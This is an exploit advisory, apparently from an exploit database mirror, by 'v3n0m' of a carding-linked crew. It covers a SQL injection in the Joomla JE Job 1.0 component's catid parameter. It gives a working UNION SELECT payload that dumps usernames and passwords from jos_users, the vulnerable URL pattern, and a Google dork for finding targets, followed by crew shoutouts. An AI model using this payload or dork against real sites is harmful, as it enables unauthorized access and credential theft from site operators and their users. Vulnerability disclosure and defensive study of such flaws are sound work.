Joomla! Component JE Job 1.0 - catid SQL Injection

🗓️ 28 May 2010 00:00:00Reported by v3n0mType

exploitpack👁 34 Views

Joomla! Component JE Job 1.0 - catid SQL Injection by v3n0

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
										.WEB.ID
-----------------------------------------------------------------------
  Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: May, 29-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : JE Job
Vendor      : http://joomlaextensions.co.in/
License     : GPLv2
Version     : 1.0 Lower versions may also be affected
Google Dork : inurl:com_jejob
 
User can search the job by Location or by Job Title or by Experience. User can 
also see the job category at the front page. Category wise jobs are displayed in it.
----------------------------------------------------------------

Exploitz:
~~~~~~~
-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/index.php?option=com_jejob&view=item&catid=[SQLi]
----------------------------------------------------------------

Shoutz:
~~~~

- 'malingsial banyak cakap, you skill off bullshit on '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,mywisdom,yadoy666,udhit
- c4uR (besok² klo curhat jangan nangis lagi ah uR bruakakaka)
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- elicha cristia [ Mizz U so much... ]
- Joss [at] hack0wn.com
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

v3n0m | YOGYACARDERLINK CREW | v3n0m666[at]live[live]com
Homepage: http://yogyacarderlink.web.id/
	  http://v3n0m.blogdetik.com/
	  http://elich4.blogspot.com/ << Update donk >_<

---------------------------[EOF]--------------------------------

28 May 2010 00:00Current

0.1Low risk

Vulners AI Score0.1